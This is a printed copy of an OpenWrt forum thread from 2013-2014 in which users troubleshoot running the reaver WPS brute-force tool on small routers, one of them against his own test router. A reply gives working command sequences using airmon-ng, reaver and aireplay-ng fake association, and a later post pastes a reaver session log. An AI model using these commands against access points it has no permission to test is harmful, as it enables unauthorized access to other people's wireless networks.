Вы находитесь на странице: 1из 4

anyone get reaver to work on 703n? (Page 1) General Discussion ...

1 of 4

https://forum.openwrt.org/viewtopic.php?id=43562

Skip to forum content


OpenWrt
Wireless Freedom
Index
User list
Search
Register
Login
You are not logged in. Please login or register.
Active topics Unanswered topics

anyone get reaver to work on 703n?


OpenWrt General Discussion anyone get reaver to work on 703n?
Pages 1
You must login or register to post a reply
RSS topic feed

Posts: 5
1 Topic by adawg89 2013-04-16 07:03:55 (edited by adawg89 2013-04-16 07:09:03)
adawg89
Member
Offline
Registered: 2012-09-10
Posts: 63
Topic: anyone get reaver to work on 703n?
I have a test router with wps, and earlier I somehow got reaver to start attacking on my router. I am not
sure if I had wlan0 up or down when I did it. I stopped the attack to install screen so I don't need to have
my laptop attached.
Was anyone else able to get reaver to work? If so, what setup did you have?
edit; appearently i got it to work, how I did it was
reaver -i mon0 -c channel number -b mac addy -vv
thing is i have to put channel number before the mac addy and i took wlan0 down too. (which I am not
sure if that made a difference)

1/4/2015 2:01 PM

anyone get reaver to work on 703n? (Page 1) General Discussion ...

2 of 4

https://forum.openwrt.org/viewtopic.php?id=43562

2 Reply by eximido 2013-04-16 07:26:43


eximido
Member
Offline
Registered: 2010-06-27
Posts: 179
Re: anyone get reaver to work on 703n?
I've got it working on WDR4900. Its a bit tricky, in fact.
At first we need to start airmon-ng to enable monitor mode at wlan0:
# airmon-ng start wlan0

Then I had to make wlan0 down to make mon0 working, by some reason it wasn't if wlan0 was up.
# ifconfig wlan0 down

After that things got differ if your router uses Little or Big Endianness. If you have LE device, then you
could start directly:
reaver -i mon0 -b <AP's MAC> -v

And just wait until it completes (or fails).


Most routers are BE, unfortunately. For them more mess is required because reaver has some code broken
for BE and cant associate with AP itself, so it needs to use other external utility for association:
# iwconfig mon0 channel <AP's channel>
# aireplay-ng -1 5 -a <AP's MAC> mon0 > /dev/null &
# reaver -i mon0 -b <AP's MAC> -vv -A

Seems like you've already made it to work while i wrote this message, but I'll post it anyway, it might be
useful for someone else one day.

3 Reply by adawg89 2013-04-16 17:11:43


adawg89
Member
Offline
Registered: 2012-09-10
Posts: 63
Re: anyone get reaver to work on 703n?
Hmm weird, reaver froze last night it was trying a pin but it never moved and it was at 3 percent, I
restarted the router and tp link and im running it again.

4 Reply by adawg89 2013-04-16 22:59:45


adawg89
Member

1/4/2015 2:01 PM

anyone get reaver to work on 703n? (Page 1) General Discussion ...

3 of 4

https://forum.openwrt.org/viewtopic.php?id=43562

Offline
Registered: 2012-09-10
Posts: 63
Re: anyone get reaver to work on 703n?
Upate; I am running it again and its currently at 20 percent.

5 Reply by Averell 2014-05-31 04:20:58 (edited by Averell 2014-05-31 04:50:04)


Averell
Member
Offline
Registered: 2013-04-10
Posts: 31
Re: anyone get reaver to work on 703n?
Hi Eximido,
I'm still not able to get it work on my Buffalo 450GH (Big Endian). It keeps getting no response from the
AP. I wonder what the part "-1 5" in this command does: "aireplay-ng -1 5 -a <AP's MAC> mon0 >
/dev/null &". Could you please help explain?
All I get now is like this:
[+]
[+]
[+]
[+]
[+]
[!]
[+]
[!]
[+]
[!]
[+]
[!]
[+]
[!]
[+]
[!]
[+]
[!]
[+]
^C
[+]

Switching mon0 to channel 11


Waiting for beacon from xx:xx:xx:xx:xx:xx
Associated with xx:xx:xx:xx:xx:xx (ESSID: <ssid>)
Trying pin 12345670
Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
Nothing done, nothing to save.

Thanks!
eximido wrote:
I've got it working on WDR4900. Its a bit tricky, in fact.
At first we need to start airmon-ng to enable monitor mode at wlan0:
# airmon-ng start wlan0

1/4/2015 2:01 PM

anyone get reaver to work on 703n? (Page 1) General Discussion ...

4 of 4

https://forum.openwrt.org/viewtopic.php?id=43562

Then I had to make wlan0 down to make mon0 working, by some reason it wasn't if wlan0
was up.
# ifconfig wlan0 down

After that things got differ if your router uses Little or Big Endianness. If you have LE
device, then you could start directly:
reaver -i mon0 -b <AP's MAC> -v

And just wait until it completes (or fails).


Most routers are BE, unfortunately. For them more mess is required because reaver has some
code broken for BE and cant associate with AP itself, so it needs to use other external utility
for association:
# iwconfig mon0 channel <AP's channel>
# aireplay-ng -1 5 -a <AP's MAC> mon0 > /dev/null &
# reaver -i mon0 -b <AP's MAC> -vv -A

Seems like you've already made it to work while i wrote this message, but I'll post it anyway,
it might be useful for someone else one day.

Posts: 5
Pages 1
You must login or register to post a reply
OpenWrt General Discussion anyone get reaver to work on 703n?
Jump to forum:

Powered by PunBB, supported by Informer Technologies, Inc.

1/4/2015 2:01 PM

Вам также может понравиться